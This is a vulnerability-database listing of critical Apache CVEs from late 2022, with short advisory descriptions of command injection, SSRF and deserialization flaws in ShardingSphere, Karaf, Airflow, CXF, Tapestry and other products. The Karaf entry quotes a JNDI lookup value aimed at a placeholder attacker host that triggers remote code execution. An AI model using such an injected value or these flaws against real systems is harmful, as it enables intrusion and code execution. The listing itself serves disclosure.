Vulnerabilities > Apache > Critical

DATE CVE VULNERABILITY TITLE RISK
2022-12-22 CVE-2022-45347 Unspecified vulnerability in Apache Shardingsphere
Apache ShardingSphere-Proxy prior to 5.3.0 when using MySQL as database backend didn't cleanup the database session completely after client authentication failed, which allowed an attacker to execute normal commands by constructing a special MySQL client.
network
low complexity
apache
critical
9.8
2022-12-21 CVE-2022-40145 Unspecified vulnerability in Apache Karaf
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
network
low complexity
apache
critical
9.8
2022-12-20 CVE-2022-46421 Unspecified vulnerability in Apache Apache-Airflow-Providers-Apache-Hive
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider.This issue affects Apache Airflow Hive Provider: before 5.0.0.
network
low complexity
apache
critical
9.8
2022-12-13 CVE-2022-46364 Unspecified vulnerability in Apache CXF
A SSRF vulnerability in parsing the href attribute of XOP:Include in MTOM requests in versions of Apache CXF before 3.5.5 and 3.4.10 allows an attacker to perform SSRF style attacks on webservices that take at least one parameter of any type. 
network
low complexity
apache
critical
9.8
2022-12-02 CVE-2022-46366 Unspecified vulnerability in Apache Tapestry
Apache Tapestry 3.x allows deserialization of untrusted data, leading to remote code execution.
network
low complexity
apache
critical
9.8
2022-11-23 CVE-2022-45462 Unspecified vulnerability in Apache Dolphinscheduler
Alarm instance management has command injection when there is a specific command configured.
network
low complexity
apache
critical
9.8
2022-11-22 CVE-2022-38649 Unspecified vulnerability in Apache Airflow
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Pinot Provider, Apache Airflow allows an attacker to control commands executed in the task execution context, without write access to DAG files.
network
low complexity
apache
critical
9.8
2022-11-22 CVE-2022-40189 Unspecified vulnerability in Apache Airflow
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Pig Provider, Apache Airflow allows an attacker to control commands executed in the task execution context, without write access to DAG files.
network
low complexity
apache
critical
9.8
2022-11-16 CVE-2022-45047 Deserialization of Untrusted Data vulnerability in Apache Sshd
Class org.apache.sshd.server.keyprovider.SimpleGeneratorHostKeyProvider in Apache MINA SSHD <= 2.9.1 uses Java deserialization to load a serialized java.security.PrivateKey.
network
low complexity
apache CWE-502
critical
9.8
2022-11-14 CVE-2022-45136 Unspecified vulnerability in Apache Jena SDB 3.17.0
Apache Jena SDB 3.17.0 and earlier is vulnerable to a JDBC Deserialisation attack if the attacker is able to control the JDBC URL used or cause the underlying database server to return malicious data.
network
low complexity
apache
critical
9.8